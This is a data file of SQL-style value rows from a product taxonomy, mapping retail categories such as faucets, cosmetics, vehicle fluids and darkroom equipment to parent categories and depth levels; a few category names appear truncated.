(2032,'Faucets',1673,'Plumbing Fixtures',3),
(2034,'Robe Hooks',574,'Bathroom Accessories',2),
(2044,'Bellows',2862,'Fireplace & Wood Stove Accessories',2),
(2045,'Office Chairs',6362,'Office Furniture',2),
(2047,'Work Safety Protective Gear',111,'Business & Industrial',1),
(2053,'Pipe & Tube Cleaners',1167,'Tools',2),
(2055,'In',2273,'Water Dispensing & Filtration',3),
(2058,'Primers',503740,'Painting Consumables',3),
(2060,'Heating Radiators',1626,'Climate Control Appliances',3),
(2062,'Toilets & Bidets',1673,'Plumbing Fixtures',3),
(2063,'Water Filter Cartridges',2171,'Water Filtration Accessories',4),
(2065,'Stock Photographs & Video Footage',5032,'Digital Goods & Currency',2),
(2068,'Nozzles',1810,'Plumbing Fittings & Supports',3),
(2070,'Portable Game Console Accessories',1270,'Video Game Console Accessories',2),
(2072,'Chippers',1795,'Heavy Machinery',2),
(2073,'Tea & Infusions',413,'Beverages',2),
(2074,'Massage Tables',5663,'Massage & Relaxation',3),
(2077,'Paint Tools',1167,'Tools',2),
(2080,'Pipe Cutters',1180,'Cutters',3),
(2081,'Bathroom Vanities',4148,'Vanities',3),
(2082,'Electronics Accessories',222,'Electronics',1),
(2088,'Shower Columns',2206,'Shower Parts',4),
(2092,'Software',0,'',0),
(2093,'Thermocouples & Thermopiles',1305,'Measuring Tools & Sensors',3),
(2096,'Camera & Optic Accessories',141,'Cameras & Optics',1),
(2104,'Place Cards',96,'Party Supplies',3),
(2106,'CB Radios',2471,'Communication Radios',3),
(2107,'Vodka',417,'Liquor & Spirits',4),
(2110,'Motorcycle Helmets',5547,'Motorcycle Protective Gear',4),
(2121,'Repeaters & Transceivers',342,'Networking',2),
(2125,'Bibs',561,'Nursing & Feeding',2),
(2126,'Cooking Oils',2660,'Cooking & Baking Ingredients',3),
(2130,'ROM',288,'Memory',3),
(2139,'Sheet Protectors',4086,'Binder Accessories',4),
(2140,'Vinegar',2660,'Cooking & Baking Ingredients',3),
(2145,'Rewinders',2027,'Video Accessories',3),
(2147,'Shovels & Spades',3173,'Gardening Tools',4),
(2154,'Public Address Systems',223,'Audio',2),
(2155,'Film & Television',111,'Business & Industrial',1),
(2160,'Garter Belts',2563,'Lingerie Accessories',4),
(2161,'Motion Sensors',359,'Business & Home Security',2),
(2165,'Audio Components',223,'Audio',2),
(2169,'Mugs',674,'Drinkware',4),
(2170,'Plumbing Wastes',504637,'Drain Components',4),
(2171,'Water Filtration Accessories',2273,'Water Dispensing & Filtration',3),
(2174,'Tool Blades',3650,'Tool Accessories',2),
(2175,'Hot Water Tanks',2751,'Water Heater Accessories',3),
(2178,'Marine Chartplotters & GPS',340,'Marine Electronics',2),
(2181,'Masonry Trowels',1193,'Masonry Tools',3),
(2182,'Converters',1801,'Components',2),
(2187,'Mining & Quarrying',111,'Business & Industrial',1),
(2188,'Jams & Jellies',5740,'Dips & Spreads',3),
(2192,'Calipers',1305,'Measuring Tools & Sensors',3),
(2194,'Cakes & Dessert Bars',1876,'Bakery',3),
(2195,'Washers',500054,'Hardware Fasteners',3),
(2198,'Tool Knives',1167,'Tools',2),
(2202,'Saw Blades',2174,'Tool Blades',3),
(2203,'Plumbing Repair Kits',133,'Plumbing',2),
(2204,'Power Tillers & Cultivators',3798,'Outdoor Power Equipment',3),
(2205,'Scan Converters',2182,'Converters',3),
(2206,'Shower Parts',504635,'Plumbing Fixture Hardware & Parts',3),
(2207,'Paper Folding Machines',2014,'Paper Handling',2),
(2208,'Manual Hammers',1186,'Hammers',3),
(2210,'Saddles',5593,'Horse Tack',4),
(2212,'Hardware Tape',503739,'Building Consumables',2),
(2214,'Gun Care & Accessories',780,'Weapons',2),
(2216,'Plumbing Pipes',133,'Plumbing',2),
(2218,'Grass Edgers',3798,'Outdoor Power Equipment',3),
(2220,'Tequila',417,'Liquor & Spirits',4),
(2221,'Water Heater Stacks',2751,'Water Heater Accessories',3),
(2222,'Video Camera Batteries',276,'Batteries',4),
(2227,'Protective Eyewear',2047,'Work Safety Protective Gear',2),
(2229,'Cookies',1876,'Bakery',3),
(2230,'Screw Posts',500054,'Hardware Fasteners',3),
(2234,'Developing & Processing Equipment',41,'Darkroom',3),
(2238,'Control Panels',1519,'HVAC Controls',3),
(2242,'Art & Drafting Tables',6363,'Workspace Tables',3),
(2243,'Water Levelers',133,'Plumbing',2),
(2246,'Blood Glucose Meters',494,'Biometric Monitors',3),
(2247,'Percolators',736,'Coffee Makers & Espresso Machines',4),
(2248,'Vehicle License Plates',2495,'Vehicle Decor',4),
(2249,'Chandeliers',3006,'Lighting Fixtures',3),
(2250,'Dusters',623,'Household Cleaning Supplies',3),
(2251,'Screws',500054,'Hardware Fasteners',3),
(2257,'Drain Liners',504637,'Drain Components',4),
(2263,'Foam Boards',966,'Display Boards',3),
(2271,'Dresses',1604,'Clothing',2),
(2273,'Water Dispensing & Filtration',133,'Plumbing',2),
(2274,'Wire Caps & Nuts',127,'Power & Electrical Supplies',2),
(2277,'Chemicals',503739,'Building Consumables',2),
(2282,'Cement, Mortar & Concrete Mixes',503743,'Masonry Consumables',3),
(2290,'Vehicle Organizers',8237,'Vehicle Storage & Cargo',3),
(2292,'White Coats',2306,'Uniforms',3),
(2301,'Shoe Bags',628,'Shoe Care & Tools',3),
(2302,'Robes',208,'Sleepwear & Loungewear',3),
(2305,'Cement Mixers',1193,'Masonry Tools',3),
(2306,'Uniforms',1604,'Clothing',2),
(2310,'Anode Rods',2751,'Water Heater Accessories',3),
(2313,'Garden Hoses',3568,'Watering & Irrigation',3),
(2314,'Bed Sheets',569,'Bedding',3),
(2330,'Knife Guides',1305,'Measuring Tools & Sensors',3),
(2334,'Wallpaper',696,'Decor',2),
(2337,'Floats',1193,'Masonry Tools',3),
(2343,'Water Dispensers',2273,'Water Dispensing & Filtration',3),
(2344,'Spice Organizers',2948,'Kitchen Organizers',4),
(2345,'Electrical Wires & Cable',127,'Power & Electrical Supplies',2),
(2353,'Mobile Phone Cases',264,'Mobile Phone Accessories',4),
(2358,'VoIP Gateways & Routers',1350,'Bridges & Routers',3),
(2359,'Pipe Connectors',1810,'Plumbing Fittings & Supports',3),
(2363,'Coasters',649,'Barware',3),
(2364,'Brandy',417,'Liquor & Spirits',4),
(2365,'Fireplace Screens',2862,'Fireplace & Wood Stove Accessories',2),
(2367,'Air Conditioner Accessories',3348,'Household Appliance Accessories',2),
(2370,'Picture Lights',594,'Lighting',2),
(2371,'Shoe Dryers',628,'Shoe Care & Tools',3),
(2372,'Turntable Accessories',1420,'Audio Accessories',3),
(2374,'Garbage Bags',630,'Household Supplies',2),
(2376,'Bidets',2062,'Toilets & Bidets',4),
(2377,'Wall Plates & Covers',127,'Power & Electrical Supplies',2),
(2380,'Industrial Staples',3650,'Tool Accessories',2),
(2387,'Feminine Pads & Protectors',485,'Feminine Sanitary Supplies',3),
(2389,'Bullet Proof Vests',2047,'Work Safety Protective Gear',2),
(2392,'Chips',423,'Snack Foods',3),
(2394,'Video Camera Lights',143,'Camera Parts & Accessories',3),
(2401,'Bulletin Boards',966,'Display Boards',3),
(2406,'Water Filter Housings',2171,'Water Filtration Accessories',4),
(2408,'Nails',500054,'Hardware Fasteners',3),
(2410,'Sink Legs',1963,'Sink Accessories',4),
(2411,'Utility Knives',1180,'Cutters',3),
(2413,'Home Automation Kits',127,'Power & Electrical Supplies',2),
(2414,'Storage Devices',285,'Computer Components',3),
(2416,'Ladder Carts',130,'Ladders & Scaffolding',3),
(2418,'Medicine Cabinets',574,'Bathroom Accessories',2),
(2422,'Espresso Machines',736,'Coffee Makers & Espresso Machines',4),
(2423,'Soups & Broths',422,'Food Items',2),
(2425,'Light Bulbs',594,'Lighting',2),
(2427,'Spurs',1933,'Shoe Accessories',2),
(2431,'Shoe Trees & Shapers',628,'Shoe Care & Tools',3),
(2432,'Puffed Rice Cakes',423,'Snack Foods',3),
(2435,'Name Plates',922,'Office Supplies',1),
(2441,'Shampoo & Conditioner',486,'Hair Care',3),
(2443,'Airsoft',499834,'Paintball & Airsoft',4),
(2446,'Storage Hooks & Racks',636,'Storage & Organization',3),
(2447,'Flashlight Accessories',3650,'Tool Accessories',2),
(2455,'Hubs & Switches',342,'Networking',2),
(2456,'Industrial Vibrators',1167,'Tools',2),
(2463,'Bathtub Spouts',2996,'Bathtub Accessories',4),
(2465,'Paint Sprayers',2077,'Paint Tools',3),
(2466,'Plumbing Valves',1810,'Plumbing Fittings & Supports',3),
(2471,'Communication Radios',262,'Communications',2),
(2473,'Gas Masks & Respirators',503724,'Protective Masks',3),
(2474,'Paint Binders',503740,'Painting Consumables',3),
(2475,'Studio Lighting Controls',42,'Lighting & Studio',3),
(2477,'Hair Combs',171,'Hair Accessories',3),
(2478,'Toilet Trim',2691,'Toilet & Bidet Accessories',4),
(2479,'Concentrators & Multiplexers',342,'Networking',2),
(2481,'Tape Measures',1305,'Measuring Tools & Sensors',3),
(2485,'Tool & Equipment Belts',3974,'Tool Storage & Organization',3),
(2486,'Airbrushes',2077,'Paint Tools',3),
(2490,'Lighting Filters & Gobos',2475,'Studio Lighting Controls',4),
(2494,'Vehicle Hardtops',3436,'Vehicle Covers',4),
(2495,'Vehicle Decor',913,'Vehicle Maintenance, Care & Decor',3),
(2496,'Medical',111,'Business & Industrial',1),
(2497,'Dollhouse Accessories',1255,'Dolls, Playsets & Toy Figures',3),
(2499,'Dollhouses',1255,'Dolls, Playsets & Toy Figures',3),
(2503,'Bar Soap',474,'Bath & Body',4),
(2505,'Play Vehicles',1253,'Toys',2),
(2507,'Insulated Bags',2920,'Food & Beverage Carriers',3),
(2508,'Styptic Pencils',528,'Shaving & Grooming',3),
(2511,'Pumice Stones',2958,'Skin Care Tools',5),
(2512,'Training Fins',6511,'Swimming Fins',5),
(2513,'Vehicle Power Steering Fluid',2788,'Vehicle Fluids',4),
(2515,'Tambourines',7285,'Hand Percussion',5),
(2516,'Retouching Equipment & Supplies',2234,'Developing & Processing Equipment',4),
(2517,'Vehicle Cooling System Additives',2788,'Vehicle Fluids',4),
(2518,'Drum Kits',75,'Percussion',4),
(2520,'Enlarging Equipment',41,'Darkroom',3),
(2521,'Eyewear Accessories',1380,'Vision Care',3),
(2522,'Bath Additives',474,'Bath & Body',4),
(2524,'Ceiling Light Fixtures',3006,'Lighting Fixtures',3),
(2526,'Facial Cleansers',567,'Skin Care',4),
(2527,'Dentures',526,'Oral Care',3),
(2528,'Off',1267,'Motor Vehicles',3),
(2530,'Household Paper Products',630,'Household Supplies',2),
(2531,'Banners',96,'Party Supplies',3),
(2532,'Construction Paper',24,'Art & Craft Paper',5),
(2534,'Motor Vehicle Window Parts & Accessories',899,'Motor Vehicle Parts',3),
(2535,'Desk & Pedestal Fans',608,'Fans',4),
(2540,'Pasta Maker Accessories',2901,'Kitchen Appliance Accessories',3),
(2541,'Duvet Covers',569,'Bedding',3),
(2543,'Darkroom Timers',2520,'Enlarging Equipment',4),
(2546,'Remote Control Toys',1253,'Toys',2),
(2547,'Placemats',601,'Table Linens',3),
(2548,'Makeup Tools',2619,'Cosmetic Tools',4),
(2549,'Washing Machines',2706,'Laundry Appliances',3),
(2550,'Motor Vehicle Engine Oil Circulation',899,'Motor Vehicle Parts',3),
(2552,'Drug Tests',505293,'Medical Tests',3),
(2556,'Motor Vehicle Wheel Parts',3020,'Motor Vehicle Wheel Systems',4),
(2559,'Gift Giving',5709,'Party & Celebration',2),
(2562,'Underwear',213,'Underwear & Socks',3),
(2563,'Lingerie Accessories',213,'Underwear & Socks',3),
(2564,'Tampons',485,'Feminine Sanitary Supplies',3),
(2570,'Plumbing Hoses & Supply Lines',133,'Plumbing',2),
(2571,'Face Makeup',477,'Makeup',4),
(2572,'Baking Mixes',2660,'Cooking & Baking Ingredients',3),
(2579,'Wine Making',3577,'Homebrewing & Winemaking Supplies',3),
(2580,'Pajamas',208,'Sleepwear & Loungewear',3),
(2582,'Vehicle Dashboard Accessories',2495,'Vehicle Decor',4),
(2587,'Balloons',96,'Party Supplies',3),
(2588,'Vehicle Antenna Balls',2495,'Vehicle Decor',4),
(2589,'Lip Liner',2645,'Lip Makeup',5),
(2590,'Car Wash Solutions',2895,'Vehicle Cleaning',4),
(2591,'Correction Fluids, Pens & Tapes',932,'General Office Supplies',2),
(2592,'Lotion & Moisturizer',567,'Skin Care',4),
(2596,'Earplugs',506,'Ear Care',3),
(2600,'Safelights',41,'Darkroom',3),
(2605,'Rum',417,'Liquor & Spirits',4),
(2608,'Light Ropes & Strings',594,'Lighting',2),
(2610,'Squeegees',623,'Household Cleaning Supplies',3),
(2611,'Plumbing Regulators',1810,'Plumbing Fittings & Supports',3),
(2612,'Dryers',2706,'Laundry Appliances',3),
(2613,'Outdoor Structures',2918,'Outdoor Living',3),
(2614,'Jump Ropes',499792,'Cardio',3),
(2618,'Jigsaw Puzzles',3867,'Puzzles',2),
(2619,'Cosmetic Tools',473,'Cosmetics',3),
(2620,'Dental Floss',526,'Oral Care',3),
(2621,'Window Valances & Cornices',603,'Window Treatments',3),
(2623,'Art Charcoals',977,'Writing & Drawing Instruments',3),
(2625,'Copystands',2234,'Developing & Processing Equipment',4),
(2626,'Food Storage',638,'Kitchen & Dining',2),
(2627,'Lens Hoods',2911,'Camera Lens Accessories',3),
(2628,'Soda',413,'Beverages',2),
(2629,'Handheld Power Drills',1217,'Drills',3),
(2631,'Pest Control Traps',728,'Pest Control',3),
(2633,'Breathalyzers',494,'Biometric Monitors',3),
(2634,'Plumbing Pipe Clamps',1810,'Plumbing Fittings & Supports',3),
(2635,'Vehicle Antifreeze',2788,'Vehicle Fluids',4),
(2636,'Shipping Supplies',922,'Office Supplies',1),
(2639,'Wood Stoves',536,'Home & Garden',1),
(2641,'Motor Vehicle Transmission & Drivetrain Parts',899,'Motor Vehicle Parts',3),
(2642,'Motor Vehicle Mirrors',899,'Motor Vehicle Parts',3),
(2643,'Vehicle Waxes, Polishes & Protectants',2895,'Vehicle Cleaning',4),
(2644,'Cookie Jars',2626,'Food Storage',3),
(2645,'Lip Makeup',477,'Makeup',4),
(2647,'Windshield Repair Kits',8236,'Vehicle Repair & Specialty Tools',4),
(2649,'Patio Heaters',1626,'Climate Control Appliances',3),
(2650,'Developing Tanks & Reels',2234,'Developing & Processing Equipment',4),
(2652,'Vehicle Display Flags',2495,'Vehicle Decor',4),
(2656,'Tweezers',2915,'Personal Care',2),
(2658,'Binder Paper',956,'Paper Products',3),
(2660,'Cooking & Baking Ingredients',422,'Food Items',2),
(2665,'Door Stops',6343,'Door Hardware',3),
(2667,'Bumper Stickers',2495,'Vehicle Decor',4),
(2668,'Wallets & Money Clips',6551,'Handbags, Wallets & Cases',2),
(2669,'Yarn',505382,'Crafting Fibers',5),
(2671,'Stencils & Die Cuts',505392,'Craft Measuring & Marking Tools',5),
(2672,'Pool Toys',2832,'Pool & Spa Accessories',3),
(2674,'Poster Boards',966,'Display Boards',3),
(2675,'Door Mats',696,'Decor',2),
(2677,'Drying Racks & Hangers',627,'Laundry Supplies',3),
(2681,'Shaving Brushes',528,'Shaving & Grooming',3),
(2683,'Nail Polishes',478,'Nail Care',4),
(2684,'Outdoor Tables',4299,'Outdoor Furniture',2),
(2686,'Eyebrow Enhancers',2779,'Eye Makeup',5),
(2688,'Vehicle Transmission Fluid',2788,'Vehicle Fluids',4),
(2689,'Sticky Notes',956,'Paper Products',3),
(2690,'Fluorescent Tubes',2425,'Light Bulbs',3),
(2691,'Toilet & Bidet Accessories',504635,'Plumbing Fixture Hardware & Parts',3),
(2693,'Poker & Game Tables',6392,'Tables',2),
(2694,'Shot Glasses',674,'Drinkware',4),
(2696,'Mattresses',6433,'Beds & Accessories',2),
(2698,'Photographic Enlargers',2520,'Enlarging Equipment',4),
(2699,'Vehicle Remote Keyless Systems',2768,'Vehicle Alarms & Locks',4),
(2700,'Pillows',569,'Bedding',3),
(2704,'Vehicle Carpet & Upholstery Cleaners',2895,'Vehicle Cleaning',4),
(2706,'Laundry Appliances',604,'Household Appliances',2),
(2710,'Pipe Adapters & Bushings',1810,'Plumbing Fittings & Supports',3),
(2712,'Stemware',674,'Drinkware',4),
(2713,'Mops',623,'Household Cleaning Supplies',3),
(2719,'Vehicle Fuel System Cleaners',2788,'Vehicle Fluids',4),
(2720,'Mattress Foundations',6433,'Beds & Accessories',2),
(2722,'Vehicle Decals',2495,'Vehicle Decor',4),
(2723,'Hardhats',2047,'Work Safety Protective Gear',2),
(2724,'Push & Pedal Riding Vehicles',2799,'Riding Toys',3),
(2726,'Tile & Shingle Cutters',1180,'Cutters',3),
(2727,'Motor Vehicle Fuel Systems',899,'Motor Vehicle Parts',3),
(2728,'Print Trays, Washers & Dryers',2234,'Developing & Processing Equipment',4),
(2729,'Countertops',115,'Building Materials',2),
(2733,'Eyeglass Lenses',1380,'Vision Care',3),
(2734,'Nail Files & Emery Boards',2975,'Nail Tools',5),
(2735,'Vehicle Greases',2788,'Vehicle Fluids',4),
(2739,'Cuticle Pushers',2975,'Nail Tools',5),
(2740,'Tanning Products',567,'Skin Care',4),
(2741,'Vellum Paper',24,'Art & Craft Paper',5),
(2742,'Paper Towels',2530,'Household Paper Products',3),
(2743,'Sandboxes',1249,'Outdoor Play Equipment',2),
(2745,'Undershirts',213,'Underwear & Socks',3),
(2747,'Body Wash',474,'Bath & Body',4),
(2750,'Vehicle Steering Wheel Locks',2768,'Vehicle Alarms & Locks',4),
(2751,'Water Heater Accessories',3348,'Household Appliance Accessories',2),
(2753,'Electric Riding Vehicles',2799,'Riding Toys',3),
(2754,'Laundry Detergent',627,'Laundry Supplies',3),
(2755,'Pool Skimmers',2832,'Pool & Spa Accessories',3),
(2756,'Horse Harnesses',5593,'Horse Tack',4),
(2757,'Kitchen & Utility Sinks',1687,'Sinks',4),
(2761,'False Eyelashes',2779,'Eye Makeup',5),
(2763,'Ponds',702,'Fountains & Ponds',3),
(2764,'Baby Transport',537,'Baby & Toddler',1),
(2765,'Foundations & Concealers',2571,'Face Makeup',5),
(2766,'Vents & Flues',499873,'Heating, Ventilation & Air Conditioning',2),
(2768,'Vehicle Alarms & Locks',8301,'Vehicle Safety & Security',3),
(2769,'Gum Stimulators',526,'Oral Care',3),
(2770,'Vehicle Performance Additives',2788,'Vehicle Fluids',4),
(2775,'Flour',2660,'Cooking & Baking Ingredients',3),
(2778,'Remote Control Toy Accessories',1253,'Toys',2),
(2779,'Eye Makeup',477,'Makeup',4),
(2780,'Eyelash Curlers',2548,'Makeup Tools',5),
(2781,'Confetti',96,'Party Supplies',3),
(2783,'Noisemakers & Party Blowers',96,'Party Supplies',3),
(2784,'Candle Holders',500121,'Home Fragrance Accessories',3),
(2786,'Futon Pads',436,'Furniture',1),
(2788,'Vehicle Fluids',913,'Vehicle Maintenance, Care & Decor',3),
(2789,'Vehicle Air Fresheners',2495,'Vehicle Decor',4),
(2792,'Chimney Brushes',1167,'Tools',2),
(2794,'Fabric Softeners & Dryer Sheets',627,'Laundry Supplies',3),
(2795,'Door Knockers',6343,'Door Hardware',3),
(2796,'Sponges & Scouring Pads',623,'Household Cleaning Supplies',3),
(2797,'Snare Drums',75,'Percussion',4),
(2799,'Riding Toys',1253,'Toys',2),
(2801,'Insoles & Inserts',515,'Foot Care',3),
(2802,'Seeds',985,'Plants',2),
(2803,'Baking Powder',2660,'Cooking & Baking Ingredients',3),
(2804,'Photographic Paper',41,'Darkroom',3),
(2805,'Motor Vehicle Climate Control',899,'Motor Vehicle Parts',3),
(2807,'Eyeliner',2779,'Eye Makeup',5),
(2808,'Hazardous Material Suits',2047,'Work Safety Protective Gear',2),
(2809,'Cabinet Light Fixtures',3006,'Lighting Fixtures',3),
(2810,'Swimming Pools',729,'Pool & Spa',2),
(2814,'Hair Color',486,'Hair Care',3),
(2815,'Photographic Analyzers',2520,'Enlarging Equipment',4),
(2816,'Wrapping Paper',94,'Gift Wrapping',4),
(2817,'Toilet Tank Levers',2691,'Toilet & Bidet Accessories',4),
(2820,'Motor Vehicle Engine Parts',899,'Motor Vehicle Parts',3),
(2826,'Flooring & Carpet',115,'Building Materials',2),
(2828,'Nail Clippers',2975,'Nail Tools',5),
(2829,'Lens Caps',2911,'Camera Lens Accessories',3),
(2832,'Pool & Spa Accessories',729,'Pool & Spa',2),
(2833,'Motor Vehicle Subwoofers',8526,'Motor Vehicle Electronics',3),
(2834,'Mascara',2779,'Eye Makeup',5),
(2835,'Tool Clamps & Vises',1167,'Tools',2),
(2836,'Vehicle Bicycle Racks',3472,'Motor Vehicle Carrying Racks',4),
(2837,'Roller Skates',499761,'Inline & Roller Skating',3),
(2839,'Wind Wheels & Spinners',696,'Decor',2),
(2843,'Pizza Pans',640,'Bakeware',4),
(2844,'Sunscreen',567,'Skin Care',4),
(2846,'Vehicle Glass Cleaners',2895,'Vehicle Cleaning',4),
(2847,'Baby Toys & Activity Equipment',537,'Baby & Toddler',1),
(2849,'Laundry Combo Units',2706,'Laundry Appliances',3),
(2851,'Drain Covers & Strainers',504637,'Drain Components',4),
(2856,'Electronic Drums',75,'Percussion',4),
(2857,'Brooms',623,'Household Cleaning Supplies',3),
(2858,'Lip Gloss',2645,'Lip Makeup',5),
(2860,'Pool Floats & Loungers',2832,'Pool & Spa Accessories',3),
(2862,'Fireplace & Wood Stove Accessories',536,'Home & Garden',1),
(2865,'Repellents',728,'Pest Control',3),
(2867,'Slides',1249,'Outdoor Play Equipment',2),
(2869,'Pesticides',728,'Pest Control',3),
(2875,'Bath Sponges & Loofahs',474,'Bath & Body',4),
(2876,'Bath Brushes',474,'Bath & Body',4),
(2878,'Hardware Accessories',632,'Hardware',1),
(2879,'Vehicle Safety Equipment',8301,'Vehicle Safety & Security',3),
(2881,'Vehicle Engine Degreasers',2788,'Vehicle Fluids',4),
(2882,'Curtains & Drapes',603,'Window Treatments',3),
(2883,'Call Bells',2986,'Office Instruments',2),
(2885,'Window Blinds & Shades',603,'Window Treatments',3),
(2886,'Bathroom Sinks',1687,'Sinks',4),
(2887,'Juice',413,'Beverages',2),
(2890,'Fitness & Nutrition',491,'Health Care',2),
(2894,'Car Wash Brushes',2895,'Vehicle Cleaning',4),
(2895,'Vehicle Cleaning',913,'Vehicle Maintenance, Care & Decor',3),
(2899,'Fresh Cut Flowers',2559,'Gift Giving',3),
(2901,'Kitchen Appliance Accessories',638,'Kitchen & Dining',2),
(2904,'Eye Shadow',2779,'Eye Makeup',5),
(2905,'Yeast',2660,'Cooking & Baking Ingredients',3),
(2907,'Medical Supplies',2496,'Medical',2),
(2909,'Pipe Caps & Plugs',1810,'Plumbing Fittings & Supports',3),
(2911,'Camera Lens Accessories',2096,'Camera & Optic Accessories',2),
(2915,'Personal Care',469,'Health & Beauty',1),
(2916,'Vehicle Hydraulic Clutch Fluid',2788,'Vehicle Fluids',4),
(2917,'Bass Drums',75,'Percussion',4),
(2918,'Outdoor Living',689,'Lawn & Garden',2),
(2919,'Electric Massaging Chairs',443,'Chairs',2),
(2920,'Food & Beverage Carriers',638,'Kitchen & Dining',2),
(2921,'Fountain & Pond Accessories',702,'Fountains & Ponds',3),
(2922,'Eye Drops & Lubricants',1380,'Vision Care',3),
(2923,'Contact Lenses',1380,'Vision Care',3),
(2926,'Studio Lights & Flashes',42,'Lighting & Studio',3),
(2927,'Pillowcases & Shams',569,'Bedding',3),
(2928,'Scrubs',2496,'Medical',2),
(2932,'Motor Vehicle Rims & Wheels',3020,'Motor Vehicle Wheel Systems',4),
(2933,'Liqueurs',417,'Liquor & Spirits',4),
(2934,'Cotton Swabs',2915,'Personal Care',2),
(2935,'Motor Vehicle Suspension Parts',899,'Motor Vehicle Parts',3),
(2939,'Diving Boards',2832,'Pool & Spa Accessories',3),
(2943,'Vehicle Windshield Fluid',2788,'Vehicle Fluids',4),
(2944,'Incandescent Light Bulbs',2425,'Light Bulbs',3),
(2946,'Nail Polish Removers',478,'Nail Care',4),
(2947,'Compact Fluorescent Lamps',2425,'Light Bulbs',3),
(2948,'Kitchen Organizers',668,'Kitchen Tools & Utensils',3),
(2949,'Diaper Rash Treatments',548,'Diapering',2),
(2951,'Tumblers',674,'Drinkware',4),
(2953,'Wind',1253,'Toys',2),
(2954,'Antiseptics & Cleaning Supplies',508,'First Aid',3),
(2956,'Lighting Accessories',536,'Home & Garden',1),
(2958,'Skin Care Tools',2619,'Cosmetic Tools',4),
(2962,'Gardening',689,'Lawn & Garden',2),
(2963,'Petticoats & Pettipants',213,'Underwear & Socks',3),
(2966,'Kickboards',1144,'Swimming',4),
(2967,'Origami Paper',24,'Art & Craft Paper',5),
(2969,'Darkroom Easels',2520,'Enlarging Equipment',4),
(2971,'Shaving Cream',528,'Shaving & Grooming',3),
(2972,'Door Bells & Chimes',6343,'Door Hardware',3),
(2974,'Bedskirts',569,'Bedding',3),
(2975,'Nail Tools',2619,'Cosmetic Tools',4),
(2976,'Corkscrews',649,'Barware',3),
(2977,'Motor Vehicle Braking',899,'Motor Vehicle Parts',3),
(2978,'Fuel Cells',275,'Power',3),
(2980,'Face Powder',2571,'Face Makeup',5),
(2981,'Pool & Spa Filters',2832,'Pool & Spa Accessories',3),
(2982,'Spas',729,'Pool & Spa',2),
(2984,'Nutrition Bars',2890,'Fitness & Nutrition',3),
(2985,'Outdoor Grills',730,'Kitchen Appliances',3),
(2986,'Office Instruments',922,'Office Supplies',1),
(2987,'Flash Brackets',143,'Camera Parts & Accessories',3),
(2988,'Mulch',2962,'Gardening',3),
(2989,'Motor Vehicle Tire Accessories',3020,'Motor Vehicle Wheel Systems',4),
(2991,'Mattress Pads',4452,'Mattress Protectors',4),
(2992,'Bunion Care Supplies',515,'Foot Care',3),
(2994,'Pool Covers & Ground Cloths',2832,'Pool & Spa Accessories',3),
(2996,'Bathtub Accessories',504635,'Plumbing Fixture Hardware & Parts',3),
(2997,'Pool Sweeps & Vacuums',2832,'Pool & Spa Accessories',3),
(2999,'Darkroom Sinks',2234,'Developing & Processing Equipment',4),
(3001,'Field Hockey Goals',499741,'Field Hockey & Lacrosse',3),
(3002,'Laboratory Chemicals',1624,'Science & Laboratory',2),
(3005,'Tom',75,'Percussion',4),
(3006,'Lighting Fixtures',594,'Lighting',2),
(3009,'Cuticle Cream & Oil',478,'Nail Care',4),
(3011,'Contact Lens Care',1380,'Vision Care',3),
(3013,'Hair Shears',486,'Hair Care',3),
(3014,'Beer Brewing Grains & Malts',3577,'Homebrewing & Winemaking Supplies',3),
(3015,'Hi',75,'Percussion',4),
(3017,'Pool Cleaners & Chemicals',2832,'Pool & Spa Accessories',3),
(3019,'Teeth Whiteners',526,'Oral Care',3),
(3020,'Motor Vehicle Wheel Systems',899,'Motor Vehicle Parts',3),
(3021,'Lipstick',2645,'Lip Makeup',5),
(3022,'Corn & Callus Care Supplies',515,'Foot Care',3),
(3024,'Vehicle Immobilizers',2768,'Vehicle Alarms & Locks',4),
(3025,'Makeup Brushes',2548,'Makeup Tools',5),
(3026,'Art Pencils',6068,'Pencils',5),
(3029,'Focusing Aids',2520,'Enlarging Equipment',4),
(3031,'Bricks & Concrete Blocks',503743,'Masonry Consumables',3),
(3032,'Handbags',6551,'Handbags, Wallets & Cases',2),
(3035,'Tripod Collars & Mounts',4638,'Tripod & Monopod Accessories',3),
(3037,'Cuticle Scissors',2975,'Nail Tools',5),
(3040,'Mouthwash',526,'Oral Care',3),
(3043,'Cymbals',75,'Percussion',4),
(3044,'Vehicle Motor Oil',2788,'Vehicle Fluids',4),
(3049,'Foot Odor Removers',515,'Foot Care',3),
(3051,'Vehicle Brake Fluid',2788,'Vehicle Fluids',4),
(3053,'Ropes & Hardware Cable',502977,'Chain, Wire & Rope',3),
(3055,'MP3 Player Cases',232,'MP3 Player Accessories',4),
(3056,'Flash Diffusers',2475,'Studio Lighting Controls',4),
(3057,'Wrestling Protective Gear',1068,'Wrestling',3),
(3059,'Billiard Ball Racks',1003,'Billiards',3),
(3060,'Football Helmet Accessories',1097,'Football Protective Gear',4),
(3061,'Paper Towel Holders & Dispensers',2948,'Kitchen Organizers',4),
(3062,'Pen & Pencil Cases',923,'Filing & Organization',2),
(3063,'Football Helmet Visors',3060,'Football Helmet Accessories',5),
(3064,'Snowshoes',1166,'Snowshoeing',4),
(3066,'Rain Suits',203,'Outerwear',3),
(3067,'Skateboarding Protective Gear',3276,'Skateboarding',3),
(3070,'Unicycle Accessories',1025,'Cycling',3),
(3071,'Gardening Forks',3173,'Gardening Tools',4),
(3072,'Napkin Holders & Dispensers',2948,'Kitchen Organizers',4),
(3073,'Snowshoe Bindings',1166,'Snowshoeing',4),
(3074,'Executive Toys',1253,'Toys',2),
(3077,'Rugby Headgear',499782,'Rugby Protective Gear',4),
(3079,'Toy Drawing Tablets',3731,'Art & Drawing Toys',3),
(3080,'Lint Rollers',627,'Laundry Supplies',3),
(3082,'Furnaces & Boilers',1626,'Climate Control Appliances',3),
(3083,'Drafting Compasses',505392,'Craft Measuring & Marking Tools',5),
(3084,'Equestrian Gloves',5594,'Riding Apparel & Accessories',4),
(3086,'Bowl Scrapers',3256,'Kitchen Scrapers',4),
(3087,'Sailboats',3540,'Watercraft',3),
(3088,'Ant Farms',1262,'Educational Toys',3),
(3089,'Cots',1014,'Camp Furniture',4),
(3090,'Football Face Masks',3060,'Football Helmet Accessories',5),
(3091,'Cooking Thermometers',668,'Kitchen Tools & Utensils',3),
(3092,'Nunchucks',780,'Weapons',2),
(3093,'Airsoft Guns',2443,'Airsoft',5),
(3094,'Transistors',3991,'Semiconductors',3),
(3095,'Motor Boats',3540,'Watercraft',3),
(3096,'Live Bait',3334,'Fishing',3),
(3097,'Watercraft Impellers',3606,'Watercraft Engine Parts',4),
(3101,'Kneeboards',3370,'Kneeboarding',5),
(3103,'Herbicides',2962,'Gardening',3),
